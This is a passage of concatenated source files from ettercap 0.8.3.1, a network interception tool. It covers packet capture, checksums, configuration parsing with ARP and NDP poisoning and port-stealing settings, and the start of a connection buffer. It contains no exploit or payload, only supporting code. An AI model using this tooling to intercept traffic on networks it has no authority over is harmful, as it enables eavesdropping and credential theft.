uint8_t *pos = buf; /* BER requires that unused bits are zero, so we can ignore the number * of unused bits */ pos++; if (len >= 2) val |= rotate_bits(*pos++); if (len >= 3) val |= ((unsigned long)rotate_bits(*pos++)) << 8; if (len >= 4) val |= ((unsigned long)rotate_bits(*pos++)) << 16; if (len >= 5) val |= ((unsigned long)rotate_bits(*pos++)) << 24; if (len >= 6) { DEBUG_MSG("X509: %s - some bits ignored " "(BIT STRING length %lu)", __FUNCTION__, (unsigned long)len); } return val; } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/ec_capture.c000664 000000 000000 00000013352 13711276346 016533 0ustar00rootroot000000 000000 /* ettercap -- iface and capture functions Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include #include #include #include #include #include #if !defined(OS_WINDOWS) #include #endif /* globals */ static SLIST_HEAD (, align_entry) aligners_table; struct align_entry { int dlt; FUNC_ALIGNER_PTR(aligner); SLIST_ENTRY (align_entry) next; }; /*******************************************/ void capture_start(struct iface_env *iface) { char thread_name[64]; snprintf(thread_name, sizeof(thread_name), "capture[%s]", iface->name); ec_thread_new(thread_name, "pcap handler and packet decoder", &capture, iface); } void capture_stop(struct iface_env *iface) { pthread_t pid; char thread_name[64]; snprintf(thread_name, sizeof(thread_name), "capture[%s]", iface->name); pid = ec_thread_getpid(thread_name); if(!pthread_equal(pid, ec_thread_getpid(NULL))) ec_thread_destroy(pid); } /* * start capturing packets */ EC_THREAD_FUNC(capture) { int ret; struct iface_env *iface; /* init the thread and wait for start up */ ec_thread_init(); iface = EC_THREAD_PARAM; DEBUG_MSG("neverending loop (capture)"); /* wipe the stats */ stats_wipe(); /* * infinite loop * dispatch packets to ec_decode */ ret = pcap_loop(iface->pcap, -1, ec_decode, EC_THREAD_PARAM); ON_ERROR(ret, -1, "Error while capturing: %s", pcap_geterr(iface->pcap)); if (EC_GBL_OPTIONS->read) { if (ret==0) { USER_MSG("\n\nCapture file read completely, please exit at your convenience.\n\n"); } } return NULL; } /* * get the list of all network interfaces */ void capture_getifs(void) { pcap_if_t *dev, *pdev, *ndev; char pcap_errbuf[PCAP_ERRBUF_SIZE]; DEBUG_MSG("capture_getifs"); /* retrieve the list */ if (pcap_findalldevs((pcap_if_t **)&EC_GBL_PCAP->ifs, pcap_errbuf) == -1) ERROR_MSG("%s", pcap_errbuf); /* analize the list and remove unwanted entries */ for (pdev = dev = (pcap_if_t *)EC_GBL_PCAP->ifs; dev != NULL; dev = ndev) { /* the next entry in the list */ ndev = dev->next; /* set the description for the local loopback */ if (dev->flags & PCAP_IF_LOOPBACK) { SAFE_FREE(dev->description); dev->description = strdup("Local Loopback"); } /* fill the empty descriptions */ if (dev->description == NULL) dev->description = dev->name; /* remove the pseudo device 'any' 'nflog' and 'nfqueue' */ /* remove the pseudo device 'dbus-system' and 'dbus-session' shown on mac when ran without sudo*/ if (!strcmp(dev->name, "any") || !strcmp(dev->name, "nflog") || !strcmp(dev->name, "nfqueue") || !strcmp(dev->name, "dbus-system") || !strcmp(dev->name, "dbus-session")) { /* check if it is the first in the list */ if (dev == EC_GBL_PCAP->ifs) EC_GBL_PCAP->ifs = ndev; else pdev->next = ndev; SAFE_FREE(dev->name); SAFE_FREE(dev->description); SAFE_FREE(dev); continue; } /* remember the previous device for the next loop */ pdev = dev; DEBUG_MSG("capture_getifs: [%s] %s", dev->name, dev->description); } /* do we have to print the list ? */ if (EC_GBL_OPTIONS->lifaces) { /* we are before ui_init(), can use printf */ fprintf(stdout, "List of available Network Interfaces:\n\n"); for (dev = (pcap_if_t *)EC_GBL_PCAP->ifs; dev != NULL; dev = dev->next) fprintf(stdout, " %s \t%s\n", dev->name, dev->description); fprintf(stdout, "\n\n"); clean_exit(0); } } /* * return default interface */ char* capture_default_if(void) { /* * as per deprecation message of pcap_lookupdev() the new way to determine * the default interface, is to use the first interface detected by the call * of pcap_findalldevs(). This is already determined in capture_getifs() and * stored in EC_GBL_PCAP->ifs */ if (EC_GBL_PCAP && EC_GBL_PCAP->ifs) return EC_GBL_PCAP->ifs->name; return NULL; } /* * check if the given file is a pcap file */ int is_pcap_file(char *file, char *pcap_errbuf) { pcap_t *pcap; pcap = pcap_open_offline(file, pcap_errbuf); if (pcap == NULL) return -E_INVALID; pcap_close(pcap); return E_SUCCESS; } /* * set the alignment for the buffer */ u_int8 get_alignment(int dlt) { struct align_entry *e; SLIST_FOREACH (e, &aligners_table, next) if (e->dlt == dlt) return e->aligner(); /* not found */ BUG("Don't know how to align this media header"); return 1; } /* * add a alignment function to the table */ void add_aligner(int dlt, FUNC_ALIGNER_PTR(aligner)) { struct align_entry *e; SAFE_CALLOC(e, 1, sizeof(struct align_entry)); e->dlt = dlt; e->aligner = aligner; SLIST_INSERT_HEAD(&aligners_table, e, next); } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/ec_checksum.c000664 000000 000000 00000022721 13711276346 016672 0ustar00rootroot000000 000000 /* ettercap -- checksumming functions Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include /* protos... */ static u_int16 sum(u_int8 *buf, size_t len); static u_int16 v4_checksum(struct packet_object *po); static u_int16 v6_checksum(struct packet_object *po); /*******************************************/ static u_int16 sum(u_int8 *buf, size_t len) { /* create union for type punning - elements named as their rep. type */ union { u_int8 u_int8 [4]; u_int16 u_int16[2]; u_int32 u_int32; } u; register u_int8 *cbuf = buf; #if OS_SIZEOF_P == 8 register u_int64 csum = 0; #elif OS_SIZEOF_P == 4 register u_int32 csum = 0; #endif register unsigned int nleft = len; #if OS_SIZEOF_P == 8 while(nleft >= sizeof(u_int32)) { /* assigning bytes from buffer to union for 64-bit systems */ u.u_int8[0] = cbuf[0]; u.u_int8[1] = cbuf[1]; u.u_int8[2] = cbuf[2]; u.u_int8[3] = cbuf[3]; csum += u.u_int32; cbuf += sizeof(u_int32); nleft -= sizeof(u_int32); } #endif while(nleft >= sizeof(u_int16)) { /* assigning bytes from buffer to union for 32-bit systems */ u.u_int8[0] = cbuf[0]; u.u_int8[1] = cbuf[1]; csum += u.u_int16[0]; cbuf += sizeof(u_int16); nleft -= sizeof(u_int16); } if(nleft) { /* one word left */ u.u_int8[0] = cbuf[0]; u.u_int8[1] = 0; csum += u.u_int16[0]; cbuf++; nleft--; } #if OS_SIZEOF_P == 8 csum = (csum >> 32) + (csum & 0xffffffff); csum = (csum >> 32) + (csum & 0xffffffff); #endif csum = (csum >> 16) + (csum & 0xffff); csum += (csum >> 16); return csum; } /* * calculate the checksum of a Layer 3 packet */ u_int16 L3_checksum(u_char *buf, size_t len) { u_int16 csum; csum = sum((u_int8 *) buf, len); return (u_int16)(~csum); } /* * calculate the checksum of a Layer 4 packet */ u_int16 L4_checksum(struct packet_object *po) { switch(ntohs(po->L3.proto)) { case LL_TYPE_IP: return v4_checksum(po); case LL_TYPE_IP6: return v6_checksum(po); default: break; } return 0; } static u_int16 v4_checksum(struct packet_object *po) { u_int32 csum; int len = po->L4.len + po->DATA.len; csum = sum(po->L4.header, len); /* check the pseudo header */ csum += po->L3.src.addr16[0]; csum += po->L3.src.addr16[1]; csum += po->L3.dst.addr16[0]; csum += po->L3.dst.addr16[1]; csum += htons((u_int16)po->L4.proto); csum += htons(len); csum = (csum >> 16) + (csum & 0xffff); csum += (csum >> 16); return (u_int16)(~csum); } static u_int16 v6_checksum(struct packet_object *po) { u_int8 *buf = po->L4.header; u_int16 plen = po->L3.payload_len; u_int32 csum; csum = sum(buf, plen); csum += sum((uint8_t*)&po->L3.src.addr, ntohs(po->L3.src.addr_len)); csum += sum((uint8_t*)&po->L3.dst.addr, ntohs(po->L3.dst.addr_len)); csum += htons(plen + po->L4.proto); csum = (csum & 0xffff) + (csum >> 16); csum += (csum >> 16); return (u_int16)(~csum); } /* * calculate the CRC32 of a buffer */ u_int32 CRC_checksum(u_char *buf, size_t len, u_int32 init) { static unsigned long crc_32_tab[] = { 0x00000000, 0x77073096, 0xee0e612c, 0x990951ba, 0x076dc419, 0x706af48f, 0xe963a535, 0x9e6495a3, 0x0edb8832, 0x79dcb8a4, 0xe0d5e91e, 0x97d2d988, 0x09b64c2b, 0x7eb17cbd, 0xe7b82d07, 0x90bf1d91, 0x1db71064, 0x6ab020f2, 0xf3b97148, 0x84be41de, 0x1adad47d, 0x6ddde4eb, 0xf4d4b551, 0x83d385c7, 0x136c9856, 0x646ba8c0, 0xfd62f97a, 0x8a65c9ec, 0x14015c4f, 0x63066cd9, 0xfa0f3d63, 0x8d080df5, 0x3b6e20c8, 0x4c69105e, 0xd56041e4, 0xa2677172, 0x3c03e4d1, 0x4b04d447, 0xd20d85fd, 0xa50ab56b, 0x35b5a8fa, 0x42b2986c, 0xdbbbc9d6, 0xacbcf940, 0x32d86ce3, 0x45df5c75, 0xdcd60dcf, 0xabd13d59, 0x26d930ac, 0x51de003a, 0xc8d75180, 0xbfd06116, 0x21b4f4b5, 0x56b3c423, 0xcfba9599, 0xb8bda50f, 0x2802b89e, 0x5f058808, 0xc60cd9b2, 0xb10be924, 0x2f6f7c87, 0x58684c11, 0xc1611dab, 0xb6662d3d, 0x76dc4190, 0x01db7106, 0x98d220bc, 0xefd5102a, 0x71b18589, 0x06b6b51f, 0x9fbfe4a5, 0xe8b8d433, 0x7807c9a2, 0x0f00f934, 0x9609a88e, 0xe10e9818, 0x7f6a0dbb, 0x086d3d2d, 0x91646c97, 0xe6635c01, 0x6b6b51f4, 0x1c6c6162, 0x856530d8, 0xf262004e, 0x6c0695ed, 0x1b01a57b, 0x8208f4c1, 0xf50fc457, 0x65b0d9c6, 0x12b7e950, 0x8bbeb8ea, 0xfcb9887c, 0x62dd1ddf, 0x15da2d49, 0x8cd37cf3, 0xfbd44c65, 0x4db26158, 0x3ab551ce, 0xa3bc0074, 0xd4bb30e2, 0x4adfa541, 0x3dd895d7, 0xa4d1c46d, 0xd3d6f4fb, 0x4369e96a, 0x346ed9fc, 0xad678846, 0xda60b8d0, 0x44042d73, 0x33031de5, 0xaa0a4c5f, 0xdd0d7cc9, 0x5005713c, 0x270241aa, 0xbe0b1010, 0xc90c2086, 0x5768b525, 0x206f85b3, 0xb966d409, 0xce61e49f, 0x5edef90e, 0x29d9c998, 0xb0d09822, 0xc7d7a8b4, 0x59b33d17, 0x2eb40d81, 0xb7bd5c3b, 0xc0ba6cad, 0xedb88320, 0x9abfb3b6, 0x03b6e20c, 0x74b1d29a, 0xead54739, 0x9dd277af, 0x04db2615, 0x73dc1683, 0xe3630b12, 0x94643b84, 0x0d6d6a3e, 0x7a6a5aa8, 0xe40ecf0b, 0x9309ff9d, 0x0a00ae27, 0x7d079eb1, 0xf00f9344, 0x8708a3d2, 0x1e01f268, 0x6906c2fe, 0xf762575d, 0x806567cb, 0x196c3671, 0x6e6b06e7, 0xfed41b76, 0x89d32be0, 0x10da7a5a, 0x67dd4acc, 0xf9b9df6f, 0x8ebeeff9, 0x17b7be43, 0x60b08ed5, 0xd6d6a3e8, 0xa1d1937e, 0x38d8c2c4, 0x4fdff252, 0xd1bb67f1, 0xa6bc5767, 0x3fb506dd, 0x48b2364b, 0xd80d2bda, 0xaf0a1b4c, 0x36034af6, 0x41047a60, 0xdf60efc3, 0xa867df55, 0x316e8eef, 0x4669be79, 0xcb61b38c, 0xbc66831a, 0x256fd2a0, 0x5268e236, 0xcc0c7795, 0xbb0b4703, 0x220216b9, 0x5505262f, 0xc5ba3bbe, 0xb2bd0b28, 0x2bb45a92, 0x5cb36a04, 0xc2d7ffa7, 0xb5d0cf31, 0x2cd99e8b, 0x5bdeae1d, 0x9b64c2b0, 0xec63f226, 0x756aa39c, 0x026d930a, 0x9c0906a9, 0xeb0e363f, 0x72076785, 0x05005713, 0x95bf4a82, 0xe2b87a14, 0x7bb12bae, 0x0cb61b38, 0x92d28e9b, 0xe5d5be0d, 0x7cdcefb7, 0x0bdbdf21, 0x86d3d2d4, 0xf1d4e242, 0x68ddb3f8, 0x1fda836e, 0x81be16cd, 0xf6b9265b, 0x6fb077e1, 0x18b74777, 0x88085ae6, 0xff0f6a70, 0x66063bca, 0x11010b5c, 0x8f659eff, 0xf862ae69, 0x616bffd3, 0x166ccf45, 0xa00ae278, 0xd70dd2ee, 0x4e048354, 0x3903b3c2, 0xa7672661, 0xd06016f7, 0x4969474d, 0x3e6e77db, 0xaed16a4a, 0xd9d65adc, 0x40df0b66, 0x37d83bf0, 0xa9bcae53, 0xdebb9ec5, 0x47b2cf7f, 0x30b5ffe9, 0xbdbdf21c, 0xcabac28a, 0x53b39330, 0x24b4a3a6, 0xbad03605, 0xcdd70693, 0x54de5729, 0x23d967bf, 0xb3667a2e, 0xc4614ab8, 0x5d681b02, 0x2a6f2b94, 0xb40bbe37, 0xc30c8ea1, 0x5a05df1b, 0x2d02ef8d }; u_int32 crc; size_t i; crc = init; for(i = 0; i < len; i++) crc = crc_32_tab[(crc ^ buf[i]) & 0xff] ^ (crc>>8); return crc; } /* stolen from wireshark source code (in_cksum.c) */ /* * Given the network-byte-order value of the checksum field in a packet * header, and the network-byte-order computed checksum of the data * that the checksum covers (including the checksum itself), compute * what the checksum field *should* have been. */ u_int16 checksum_shouldbe(u_int16 csum, u_int16 computed_sum) { u_int32 shouldbe; /* * The value that should have gone into the checksum field * is the negative of the value gotten by summing up everything * *but* the checksum field. * * We can compute that by subtracting the value of the checksum * field from the sum of all the data in the packet, and then * computing the negative of that value. * * "sum" is the value of the checksum field, and "computed_sum" * is the negative of the sum of all the data in the packets, * so that's -(-computed_sum - sum), or (sum + computed_sum). * * All the arithmetic in question is one's complement, so the * addition must include an end-around carry; we do this by * doing the arithmetic in 32 bits (with no sign-extension), * and then adding the upper 16 bits of the sum, which contain * the carry, to the lower 16 bits of the sum, and then do it * again in case *that* sum produced a carry. * * As RFC 1071 notes, the checksum can be computed without * byte-swapping the 16-bit words; summing 16-bit words * on a big-endian machine gives a big-endian checksum, which * can be directly stuffed into the big-endian checksum fields * in protocol headers, and summing words on a little-endian * machine gives a little-endian checksum, which must be * byte-swapped before being stuffed into a big-endian checksum * field. * * "computed_sum" is a network-byte-order value, so we must put * it in host byte order before subtracting it from the * host-byte-order value from the header; the adjusted checksum * will be in host byte order, which is what we'll return. */ shouldbe = ntohs(csum); shouldbe += ntohs(computed_sum); shouldbe = (shouldbe & 0xFFFF) + (shouldbe >> 16); shouldbe = (shouldbe & 0xFFFF) + (shouldbe >> 16); return shouldbe; } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/ec_conf.c000664 000000 000000 00000036537 13711276346 016027 0ustar00rootroot000000 000000 /* ettercap -- configuration (etter.conf) manipulation module Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include #include /* globals */ /* used only to keep track of how many dissector are loaded */ int number_of_dissectors; int number_of_ports; static struct conf_entry privs[] = { { "ec_uid", NULL }, { "ec_gid", NULL }, { NULL, NULL }, }; static struct conf_entry mitm[] = { { "arp_storm_delay", NULL }, { "arp_poison_delay", NULL }, { "arp_poison_smart", NULL }, { "arp_poison_warm_up", NULL }, { "arp_poison_icmp", NULL }, { "arp_poison_reply", NULL }, { "arp_poison_request", NULL }, { "arp_poison_equal_mac", NULL }, { "dhcp_lease_time", NULL }, { "port_steal_delay", NULL }, { "port_steal_send_delay", NULL }, #ifdef WITH_IPV6 { "ndp_poison_warm_up", NULL }, { "ndp_poison_delay", NULL }, { "ndp_poison_send_delay", NULL }, { "ndp_poison_icmp", NULL }, { "ndp_poison_equal_mac", NULL}, { "icmp6_probe_delay", NULL }, #endif { NULL, NULL }, }; static struct conf_entry connections[] = { { "connection_timeout", NULL }, { "connection_idle", NULL }, { "connection_buffer", NULL }, { "connect_timeout", NULL }, { NULL, NULL }, }; static struct conf_entry stats[] = { { "sampling_rate", NULL }, { NULL, NULL }, }; static struct conf_entry misc[] = { { "close_on_eof", NULL }, { "store_profiles", NULL }, { "aggressive_dissectors", NULL }, { "skip_forwarded_pcks", NULL }, { "checksum_warning", NULL }, { "checksum_check", NULL }, { "submit_fingerprint", NULL }, { "sniffing_at_startup", NULL }, { "geoip_support_enable", NULL }, { "gtkui_prefer_dark_theme", NULL }, { NULL, NULL }, }; static struct conf_entry curses[] = { { "color_bg", NULL }, { "color_fg", NULL }, { "color_join1", NULL }, { "color_join2", NULL }, { "color_border", NULL }, { "color_title", NULL }, { "color_focus", NULL }, { "color_menu_bg", NULL }, { "color_menu_fg", NULL }, { "color_window_bg", NULL }, { "color_window_fg", NULL }, { "color_selection_fg", NULL }, { "color_selection_bg", NULL }, { "color_error_bg", NULL }, { "color_error_fg", NULL }, { "color_error_border", NULL }, { NULL, NULL }, }; static struct conf_entry strings[] = { { "redir_command_on", NULL }, { "redir_command_off", NULL }, #ifdef WITH_IPV6 { "redir6_command_on", NULL }, { "redir6_command_off", NULL }, #endif { "remote_browser", NULL }, { "utf8_encoding", NULL }, { "geoip_data_file", NULL }, { "geoip_data_file_v6", NULL }, { NULL, NULL }, }; /* this is fake, dissector use a different registration */ static struct conf_entry dissectors[] = { { "fake", &number_of_dissectors }, { NULL, NULL }, }; static struct conf_section sections[] = { { "privs", privs}, { "mitm", mitm}, { "connections", connections}, { "stats", stats}, { "misc", misc}, { "dissectors", dissectors}, { "curses", curses}, { "strings", strings}, { NULL, NULL }, }; /* protos */ static void init_structures(void); static void set_pointer(struct conf_entry *entry, const char *name, void *ptr); static void sanity_checks(void); static void set_dissector(char *name, char *values, int lineno); static struct conf_entry * search_section(char *title); static void * search_entry(struct conf_entry *section, char *name); /************************************************/ /* * since EC_GBL_CONF is in the heap, it is not constant * so we have to initialize it here and not in the * structure definition */ static void init_structures(void) { int i = 0, j = 0; DEBUG_MSG("init_structures"); set_pointer(privs, "ec_uid", &EC_GBL_CONF->ec_uid); set_pointer(privs, "ec_gid", &EC_GBL_CONF->ec_gid); set_pointer(mitm, "arp_storm_delay", &EC_GBL_CONF->arp_storm_delay); set_pointer(mitm, "arp_poison_smart", &EC_GBL_CONF->arp_poison_smart); set_pointer(mitm, "arp_poison_warm_up", &EC_GBL_CONF->arp_poison_warm_up); set_pointer(mitm, "arp_poison_delay", &EC_GBL_CONF->arp_poison_delay); set_pointer(mitm, "arp_poison_icmp", &EC_GBL_CONF->arp_poison_icmp); set_pointer(mitm, "arp_poison_reply", &EC_GBL_CONF->arp_poison_reply); set_pointer(mitm, "arp_poison_request", &EC_GBL_CONF->arp_poison_request); set_pointer(mitm, "arp_poison_equal_mac", &EC_GBL_CONF->arp_poison_equal_mac); set_pointer(mitm, "dhcp_lease_time", &EC_GBL_CONF->dhcp_lease_time); set_pointer(mitm, "port_steal_delay", &EC_GBL_CONF->port_steal_delay); set_pointer(mitm, "port_steal_send_delay", &EC_GBL_CONF->port_steal_send_delay); #ifdef WITH_IPV6 set_pointer(mitm, "ndp_poison_warm_up", &EC_GBL_CONF->ndp_poison_warm_up); set_pointer(mitm, "ndp_poison_delay", &EC_GBL_CONF->ndp_poison_delay); set_pointer(mitm, "ndp_poison_send_delay", &EC_GBL_CONF->ndp_poison_send_delay); set_pointer(mitm, "ndp_poison_icmp", &EC_GBL_CONF->ndp_poison_icmp); set_pointer(mitm, "ndp_poison_equal_mac", &EC_GBL_CONF->ndp_poison_equal_mac); set_pointer(mitm, "icmp6_probe_delay", &EC_GBL_CONF->icmp6_probe_delay); #endif set_pointer(connections, "connection_timeout", &EC_GBL_CONF->connection_timeout); set_pointer(connections, "connection_idle", &EC_GBL_CONF->connection_idle); set_pointer(connections, "connection_buffer", &EC_GBL_CONF->connection_buffer); set_pointer(connections, "connect_timeout", &EC_GBL_CONF->connect_timeout); set_pointer(stats, "sampling_rate", &EC_GBL_CONF->sampling_rate); set_pointer(misc, "close_on_eof", &EC_GBL_CONF->close_on_eof); set_pointer(misc, "store_profiles", &EC_GBL_CONF->store_profiles); set_pointer(misc, "aggressive_dissectors", &EC_GBL_CONF->aggressive_dissectors); set_pointer(misc, "skip_forwarded_pcks", &EC_GBL_CONF->skip_forwarded); set_pointer(misc, "checksum_warning", &EC_GBL_CONF->checksum_warning); set_pointer(misc, "checksum_check", &EC_GBL_CONF->checksum_check); set_pointer(misc, "submit_fingerprint", &EC_GBL_CONF->submit_fingerprint); set_pointer(misc, "sniffing_at_startup", &EC_GBL_CONF->sniffing_at_startup); set_pointer(misc, "geoip_support_enable", &EC_GBL_CONF->geoip_support_enable); set_pointer(misc, "gtkui_prefer_dark_theme", &EC_GBL_CONF->gtkui_prefer_dark_theme); set_pointer(curses, "color_bg", &EC_GBL_CONF->colors.bg); set_pointer(curses, "color_fg", &EC_GBL_CONF->colors.fg); set_pointer(curses, "color_join1", &EC_GBL_CONF->colors.join1); set_pointer(curses, "color_join2", &EC_GBL_CONF->colors.join2); set_pointer(curses, "color_border", &EC_GBL_CONF->colors.border); set_pointer(curses, "color_title", &EC_GBL_CONF->colors.title); set_pointer(curses, "color_focus", &EC_GBL_CONF->colors.focus); set_pointer(curses, "color_menu_bg", &EC_GBL_CONF->colors.menu_bg); set_pointer(curses, "color_menu_fg", &EC_GBL_CONF->colors.menu_fg); set_pointer(curses, "color_window_bg", &EC_GBL_CONF->colors.window_bg); set_pointer(curses, "color_window_fg", &EC_GBL_CONF->colors.window_fg); set_pointer(curses, "color_selection_bg", &EC_GBL_CONF->colors.selection_bg); set_pointer(curses, "color_selection_fg", &EC_GBL_CONF->colors.selection_fg); set_pointer(curses, "color_error_bg", &EC_GBL_CONF->colors.error_bg); set_pointer(curses, "color_error_fg", &EC_GBL_CONF->colors.error_fg); set_pointer(curses, "color_error_border", &EC_GBL_CONF->colors.error_border); /* special case for strings */ set_pointer(strings, "redir_command_on", &EC_GBL_CONF->redir_command_on); set_pointer(strings, "redir_command_off", &EC_GBL_CONF->redir_command_off); #ifdef WITH_IPV6 set_pointer(strings, "redir6_command_on", &EC_GBL_CONF->redir6_command_on); set_pointer(strings, "redir6_command_off", &EC_GBL_CONF->redir6_command_off); #endif set_pointer(strings, "remote_browser", &EC_GBL_CONF->remote_browser); set_pointer(strings, "utf8_encoding", &EC_GBL_CONF->utf8_encoding); set_pointer(strings, "geoip_data_file", &EC_GBL_CONF->geoip_data_file); set_pointer(strings, "geoip_data_file_v6", &EC_GBL_CONF->geoip_data_file_v6); /* sanity check */ do { do { if (sections[i].entries[j].value == NULL) { DEBUG_MSG("INVALID init: %s %s", sections[i].entries[j].name, sections[i].title); BUG("check the debug file..."); } } while (sections[i].entries[++j].name != NULL); j = 0; } while (sections[++i].title != NULL); } /* * associate the pointer to a struct */ static void set_pointer(struct conf_entry *entry, const char *name, void *ptr) { int i = 0; /* search the name */ do { /* found ! set the pointer */ if (!strcmp(entry[i].name, name)) entry[i].value = ptr; } while (entry[++i].name != NULL); } static void sanity_checks() { // sampling_rate cannot be equal to 0, since we divide by it if (EC_GBL_CONF->sampling_rate == 0) EC_GBL_CONF->sampling_rate = 50; } /* * load the configuration from etter.conf file */ void load_conf(void) { FILE *fc; char line[256]; char *p, *q, **tmp; int lineno = 0; size_t tmplen; struct conf_entry *curr_section = NULL; void *value = NULL; /* initialize the structures */ init_structures(); DEBUG_MSG("load_conf"); /* the user has specified an alternative config file */ if (EC_GBL_CONF->file) { DEBUG_MSG("load_conf: alternative config: %s", EC_GBL_CONF->file); fc = fopen(EC_GBL_CONF->file, FOPEN_READ_TEXT); ON_ERROR(fc, NULL, "Cannot open %s", EC_GBL_CONF->file); } else { /* errors are handled by the function */ fc = open_data("etc", ETTER_CONF, FOPEN_READ_TEXT); ON_ERROR(fc, NULL, "Cannot open %s", ETTER_CONF); } /* read the file */ while (fgets(line, sizeof(line), fc) != 0) { /* update the line count */ lineno++; /* trim out the comments */ if ((p = strchr(line, '#'))) *p = '\0'; /* trim out the new line */ if ((p = strchr(line, '\n'))) *p = '\0'; q = line; /* trim the initial spaces */ while (q < line + sizeof(line) && *q == ' ') q++; /* skip empty lines */ if (line[0] == '\0' || *q == '\0') continue; /* here starts a new section [...] */ if (*q == '[') { /* remove the square brackets */ if ((p = strchr(line, ']'))) *p = '\0'; else FATAL_ERROR("Missing ] in %s line %d", ETTER_CONF, lineno); p = q + 1; DEBUG_MSG("load_conf: SECTION: %s", p); /* get the pointer to the right structure */ if ( (curr_section = search_section(p)) == NULL) FATAL_ERROR("Invalid section in %s line %d", ETTER_CONF, lineno); /* read the next line */ continue; } /* variable outside a section */ if (curr_section == NULL) FATAL_ERROR("Entry outside a section in %s line %d", ETTER_CONF, lineno); /* sanity check */ if (!strchr(q, '=')) FATAL_ERROR("Parse error %s line %d", ETTER_CONF, lineno); p = q; /* split the entry name from the value */ do { if (*p == ' ' || *p == '='){ *p = '\0'; break; } } while (p++ < line + sizeof(line) ); /* move p to the value */ p++; do { if (*p != ' ' && *p != '=') break; } while (p++ < line + sizeof(line) ); /* * if it is the "dissector" section, * do it in a different way */ if (curr_section == dissectors) { set_dissector(q, p, lineno); continue; } /* search the entry name */ if ( (value = search_entry(curr_section, q)) == NULL) FATAL_ERROR("Invalid entry in %s line %d", ETTER_CONF, lineno); /* strings must be handled in a different way */ if (curr_section == strings) { /* trim the quotes */ if (*p == '"') p++; /* set the string value */ tmp = (char **)value; *tmp = strdup(p); /* trim the ending quotes */ p = *tmp; tmplen = strlen(*tmp); do { if (*p == '"') { *p = 0; break; } } while (p++ < *tmp + tmplen ); DEBUG_MSG("load_conf: \tENTRY: %s [%s]", q, *tmp); } else { /* set the integer value */ *(int *)value = strtol(p, (char **)NULL, 10); DEBUG_MSG("load_conf: \tENTRY: %s %d", q, *(int *)value); } } sanity_checks(); fclose(fc); } /* * returns the pointer to the struct * named "title" */ static struct conf_entry * search_section(char *title) { int i = 0; do { /* the section was found */ if (!strcasecmp(sections[i].title, title)) return sections[i].entries; } while (sections[++i].title != NULL); return NULL; } /* * returns the pointer to the value * named "name" of the sections "section" */ static void * search_entry(struct conf_entry *section, char *name) { int i = 0; do { /* the section was found */ if (!strcasecmp(section[i].name, name)) return section[i].value; } while (section[++i].name != NULL); return NULL; } /* * handle the special case of dissectors */ static void set_dissector(char *name, char *values, int lineno) { char *p, *q = values; u_int32 value; int first = 0; /* remove trailing spaces */ if ((p = strchr(values, ' ')) != NULL) *p = '\0'; /* expand multiple ports dissectors */ for(p=strsep(&values, ","); p != NULL; p=strsep(&values, ",")) { /* get the value for the port */ value = atoi(p); //DEBUG_MSG("load_conf: \tDISSECTOR: %s\t%d", name, value); /* count the dissectors and the port monitored */ if (value) { number_of_ports++; if (first == 0) { number_of_dissectors++; first = 1; } } /* the first value replaces all the previous */ if (p == q) { if (dissect_modify(MODE_REP, name, value) != E_SUCCESS) fprintf(stderr, "Dissector \"%s\" not supported (%s line %d)\n", name, ETTER_CONF, lineno); } else { /* the other values have to be added */ if (dissect_modify(MODE_ADD, name, value) != E_SUCCESS) fprintf(stderr, "Dissector \"%s\" not supported (%s line %d)\n", name, ETTER_CONF, lineno); } } } /* * print the number of dissectors loaded */ void conf_dissectors(void) { USER_MSG("%4d protocol dissectors\n", number_of_dissectors); USER_MSG("%4d ports monitored\n", number_of_ports); } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/ec_connbuf.c000664 000000 000000 00000011311 13711276346 016513 0ustar00rootroot000000 000000 /* ettercap -- connection buffer module Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include /* mutexes */ #define CONNBUF_INIT_LOCK(x) do{ pthread_mutex_init(&x, NULL); }while(0) #define CONNBUF_LOCK(x) do{ pthread_mutex_lock(&x); }while(0) #define CONNBUF_UNLOCK(x) do{ pthread_mutex_unlock(&x); }while(0) /************************************************/ /* * initialize the buffer */ void connbuf_init(struct conn_buf *cb, size_t size) { DEBUG_MSG("connbuf_init"); /* init the size */ cb->size = 0; cb->max_size = size; /* init the tail */ TAILQ_INIT(&cb->connbuf_tail); /* init the mutex */ CONNBUF_INIT_LOCK(cb->connbuf_mutex); } /* * add the packet to the conn_buf. * check if the buffer has reached the max size * and in case delete the oldest elements to * fit the predefined size. * * the tail has the newer packet in the head and * older in the tail. */ int connbuf_add(struct 